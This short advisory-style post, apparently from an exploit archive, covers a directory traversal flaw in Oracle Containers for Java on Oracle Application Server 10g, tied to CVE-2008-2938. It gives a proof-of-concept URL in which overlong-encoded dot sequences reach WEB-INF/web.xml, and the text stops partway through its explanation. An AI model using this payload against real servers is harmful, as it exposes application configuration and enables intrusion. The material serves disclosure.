Oracle Containers For Java Traversal

Server Version Info: Oracle-Application-Server-10g/10.1.3.1.0 Oracle-HTTP-Server PoC: http://OC4J/web-app/foobar/%c0%ae%c0%ae/WEB-INF/web.xml Related: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938 Explaination: The "%c0%ae%c0%ae" is interpreted as: ".." because on Java's side:...